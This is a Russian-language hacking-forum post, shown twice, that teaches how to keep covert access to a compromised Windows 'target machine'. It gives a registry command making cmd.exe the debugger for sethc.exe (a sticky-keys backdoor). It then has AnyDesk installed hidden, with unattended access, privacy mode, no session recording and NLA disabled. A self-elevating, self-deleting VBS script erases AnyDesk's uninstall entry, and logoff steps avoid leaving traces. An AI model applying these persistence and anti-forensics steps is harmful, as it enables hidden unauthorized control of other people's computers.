Всем привет. Не нашел чего-то похожего на форуме, так что поделюсь пожалуй сам.
Возможно Вы сталкивались с проблемой потери доступа к целевой машине.
Многие знают, что в OS Windows есть уязвимость при создании бэкдора через .exe файлы: sethc.exe – залипание клавиш, osk.exe – экранная клавиатура, Narrator.exe – экранный диктор, Magnify.exe – экранная лупа, DisplaySwitch.exe – переключение экрана. Путём не трудных манипуляций можно либо подменить данные .exe файлы на cmd.exe, либо через реестр добавить опцию debugger для этих .exe файлов.
Если у машины включен удалённый доступ бэкдор будет работать, но если RDP порт не проброшен через маршрутизатор, то в сеть он не выйдет и возможности подключиться из вне не будет. Заниматься проброской портов не всегда возможно.
Есть решение через программу удалённого доступа AnyDesk.
Плюсы:
- AnyDesk не будет свититься в трее других юзеров;
- AnyDesk не будет светиться в установленных программах машины;
- Подключение будет с полным контролем.
Минусы:
- процесс AnyDesk будет светиться только в диспетчере задач от system (если есть мысли как пофиксить такой момент, охотно послушаем).
Для начала нам всё же понадбится бэкдор на основе .exe файлов описаных выше. Как подменить сами файлы я описывать не стану. Проще внести изменения в реестр с помощью простой команды:
Метод выполнения этой комманды на машине выбирайте сами для себя.
Удобнее всего ставить sethc.exe т.к. залипание клавиш работает без трудностей.
Теперь основная часть.
1. Для начала качаем AnyDesk с официального сайта www.anydesk.com;
2. Устанавливаем ее на целевую машину;
3. Выбираем директорию в которую будет установлена прога, чем дальше и запутаннее будет этот путь, тем лучше.
4. Снимаем все галочки созданий ярлыков и тп., убираем автоматическое обновление;
5. Переходим в настройки, вкладка безопасность;
6. Нажимаем изменить пароль доступа, задаём пароль для подключения и выбираем в профиле прав доступа "неконтролируемый доступ". Применяем;
7. Ниже проверяем галочки на режиме "приватности" и "созадать TCP тунели", снимаем галочку на "разрешить запись сеанса";
8. В самом низу убираем галочку "показывать онлайн-статус удаленных рабочих столов";
9. Закрываем настройки, переписываем ID AnyDesk, и закрываем окно программы;
http://xss.pro/attachments/42427/?hash=d38dfcdddab02fd505e9efecb49f1046
10. Теперь начинаем готовить машину. Сначала в свойствах системы отключаем авторизацию на уровне сети (NLA);
11. Переходим в папку с установленым AnyDesk
Открываем свойства приложения -> безопасность -> "дополнительно" -> отключаем наследование -> удаляем из списка все разрешения (пользователей) кроме SYSTEM, это не позволит грузиться AnyDesk в трей при входе местного пользователя через консоль или RDP. Сохраняем настройки;
12. Через диспетчер задач завершаем все процессы AnyDesk за исключением процесса запущенного от SYSTEM;
13. Остается удалить из панели управления информацию об установленной программе, это проще всего сделать через vbs скрипт.
Код скрипта:
После этих не хитрых операций, AnyDesk готов к эксплуатации. При подключении через AnyDesk Вы попадёте на экран залогинивания, где сможете подключиться от нужного Вам пользователя. Когда Вы залогинетесь в трее отобразится значок программы и будет запущен его дополнительный процесс от имени текущего пользователя. Чтоб не оставлять следов присутствия и не светить значок AnyDesk в трее, отключаться следует через полное завершение сеанса (команда: logoff). Если полное завершение сеанса нежелательно, следует создать новый сеанс в AnyDesk с использованием только цифр ID и подключиться к монитору консоли. В консольном соединении вызываем заранее установленный бэкдор на залипание клавиш, открываем Диспетчер задач и в нём завершаем все процессы AnyDesk кроме того, что запущен от системы.
Это вариант исполнения бэкдора именно на аньке, если есть чем дополнить такой способ, велком в комментарии.
Прекрасно знаю что есть еще тонна других способов закрепиться на машине, здесь рассмотрели конкретно этот.
Возможно Вы сталкивались с проблемой потери доступа к целевой машине.
Многие знают, что в OS Windows есть уязвимость при создании бэкдора через .exe файлы: sethc.exe – залипание клавиш, osk.exe – экранная клавиатура, Narrator.exe – экранный диктор, Magnify.exe – экранная лупа, DisplaySwitch.exe – переключение экрана. Путём не трудных манипуляций можно либо подменить данные .exe файлы на cmd.exe, либо через реестр добавить опцию debugger для этих .exe файлов.
Если у машины включен удалённый доступ бэкдор будет работать, но если RDP порт не проброшен через маршрутизатор, то в сеть он не выйдет и возможности подключиться из вне не будет. Заниматься проброской портов не всегда возможно.
Есть решение через программу удалённого доступа AnyDesk.
Плюсы:
- AnyDesk не будет свититься в трее других юзеров;
- AnyDesk не будет светиться в установленных программах машины;
- Подключение будет с полным контролем.
Минусы:
- процесс AnyDesk будет светиться только в диспетчере задач от system (если есть мысли как пофиксить такой момент, охотно послушаем).
Для начала нам всё же понадбится бэкдор на основе .exe файлов описаных выше. Как подменить сами файлы я описывать не стану. Проще внести изменения в реестр с помощью простой команды:
Код:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"Удобнее всего ставить sethc.exe т.к. залипание клавиш работает без трудностей.
Теперь основная часть.
1. Для начала качаем AnyDesk с официального сайта www.anydesk.com;
2. Устанавливаем ее на целевую машину;
3. Выбираем директорию в которую будет установлена прога, чем дальше и запутаннее будет этот путь, тем лучше.
4. Снимаем все галочки созданий ярлыков и тп., убираем автоматическое обновление;
5. Переходим в настройки, вкладка безопасность;
6. Нажимаем изменить пароль доступа, задаём пароль для подключения и выбираем в профиле прав доступа "неконтролируемый доступ". Применяем;
7. Ниже проверяем галочки на режиме "приватности" и "созадать TCP тунели", снимаем галочку на "разрешить запись сеанса";
8. В самом низу убираем галочку "показывать онлайн-статус удаленных рабочих столов";
9. Закрываем настройки, переписываем ID AnyDesk, и закрываем окно программы;
http://xss.pro/attachments/42427/?hash=d38dfcdddab02fd505e9efecb49f1046
10. Теперь начинаем готовить машину. Сначала в свойствах системы отключаем авторизацию на уровне сети (NLA);
11. Переходим в папку с установленым AnyDesk
Открываем свойства приложения -> безопасность -> "дополнительно" -> отключаем наследование -> удаляем из списка все разрешения (пользователей) кроме SYSTEM, это не позволит грузиться AnyDesk в трей при входе местного пользователя через консоль или RDP. Сохраняем настройки;
12. Через диспетчер задач завершаем все процессы AnyDesk за исключением процесса запущенного от SYSTEM;
13. Остается удалить из панели управления информацию об установленной программе, это проще всего сделать через vbs скрипт.
Код скрипта:
У вас должно быть более 20 реакций для просмотра скрытого контента.
If Not WScript.Arguments.Named.Exists("elevate") Then
CreateObject("Shell.Application").ShellExecute WScript.FullName _
, """" & WScript.ScriptFullName & """ /elevate", "", "runas", 0
WScript.Quit
End If
On Error Resume Next
WScript.CreateObject("WScript.Shell").RegDelete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AnyDesk\"
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.DeleteFile WScript.ScriptFullName, 0После этих не хитрых операций, AnyDesk готов к эксплуатации. При подключении через AnyDesk Вы попадёте на экран залогинивания, где сможете подключиться от нужного Вам пользователя. Когда Вы залогинетесь в трее отобразится значок программы и будет запущен его дополнительный процесс от имени текущего пользователя. Чтоб не оставлять следов присутствия и не светить значок AnyDesk в трее, отключаться следует через полное завершение сеанса (команда: logoff). Если полное завершение сеанса нежелательно, следует создать новый сеанс в AnyDesk с использованием только цифр ID и подключиться к монитору консоли. В консольном соединении вызываем заранее установленный бэкдор на залипание клавиш, открываем Диспетчер задач и в нём завершаем все процессы AnyDesk кроме того, что запущен от системы.
Это вариант исполнения бэкдора именно на аньке, если есть чем дополнить такой способ, велком в комментарии.
Прекрасно знаю что есть еще тонна других способов закрепиться на машине, здесь рассмотрели конкретно этот.
